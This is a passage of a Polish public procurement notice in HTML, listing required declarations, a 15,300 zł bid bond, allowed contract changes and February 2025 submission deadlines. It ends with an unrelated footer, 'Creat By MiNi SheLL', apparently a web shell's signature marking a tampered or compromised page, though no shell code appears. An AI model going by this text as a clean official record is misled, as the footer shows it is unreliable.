trzecie:<br/>Wykonawca nie może powoływać się na zdolności lub sytuację podmiotów trzecich, jeśli nie zostały one wskazane w ofercie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 7, 8, 10 ustawy Pzp oraz z przesłanek o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2023 poz. 1497).<br/>2. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>UWAGA: Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowego środka dowodowego, o którym mowa w pkt 1. dotyczącego tych podmiotów, potwierdzającego, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie.<br/>Dowodami, o których mowa, są:<br/>- Referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane;<br/>- Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>UWAGA: Okres 3 lat liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz kryterium oceny ofert dotyczący doświadczenia architekta prowadzącego, jeśli Wykonawca ubiega się o punkty w tym kryterium (wzór załącznik nr 2 do SWZ)- dokument składany wraz z ofertą.<br/>2.	Odpis lub informacja z KRS, CEIDG lub innego rejestru (jeśli dotyczy).<br/>3.	Pełnomocnictwo (jeśli dotyczy).<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy).( wzór załącznik nr 7 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania o udzielenie zamówienia, Wykonawca zobowiązany jest do wniesienia wadium w wysokości 15 300,00 zł (słownie: piętnaście tysięcy trzysta złotych). Wadium musi zostać skutecznie wniesione do upływu terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1.	Wykonawcy składający ofertę wspólną muszą ustanowić pełnomocnika.<br/>2.	Każdy z Wykonawców wspólnie składających ofertę musi wykazać brak podstaw wykluczenia.<br/>3.	W przypadku korzystania z zasobów podmiotów trzecich należy dołączyć odpowiednie oświadczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej Umowy w zakresie: <br/>1)	zmiany terminu wykonania przedmiotu umowy w przypadku: <br/>a)	zmiany uwarunkowań formalno-prawnych na etapie projektowania i uzgodnień dokumentacji z przyczyn niezależnych od obu stron, <br/>b)	konieczności przeprowadzenia dodatkowych badań, ekspertyz, analiz itp., <br/>c) opóźnień w działaniach organów administracji publicznej, które nie wynikają z zaniedbań Wykonawcy, <br/>d) opóźnień w wydawaniu decyzji, zezwoleń lub uzgodnień przez organy administracji publicznej, które przekraczają ustawowe terminy, <br/>e) wystąpienia siły wyższej, rozumianej jako zdarzenie zewnętrzne, niezależne od stron, którego nie można było przewidzieć ani zapobiec, w szczególności klęski żywiołowe, zamieszki, strajki, akty terrorystyczne, działania wojenne, akty władzy państwowej lub inne okoliczności uniemożliwiające realizację umowy, <br/>f) przyczyn niezależnych od stron, których nie można było uniknąć ani przewidzieć, <br/>g) konieczności wprowadzenia dodatkowych opracowań lub zamiennych rozwiązań wynikających z nieprzewidzianych uwarunkowań technicznych lub formalno-prawnych. <br/>2)	zmiany wysokości wynagrodzenia Wykonawcy w zakresie i na zasadach określonych w paragrafie 13 umowy: <br/>a)	zmiany cen materiałów i kosztów realizacji zamówienia,<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę lub minimalnej stawki godzinowej,<br/>c) zmiany wysokości składek na ubezpieczenie społeczne lub zdrowotne <br/>d) zmiany stawek podatku VAT lub podatku akcyzowego,<br/>3)	zmiany sposobu realizacji przedmiotu umowy w przypadku: <br/>a)	wprowadzenia rozwiązań korzystnych dla Zamawiającego, <br/>b)	konieczności dostosowania zakresu zamówienia do zaistniałych uwarunkowań technicznych lub formalno-prawnych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem interaktywnego formularz oferty udostepnionego na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-18 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com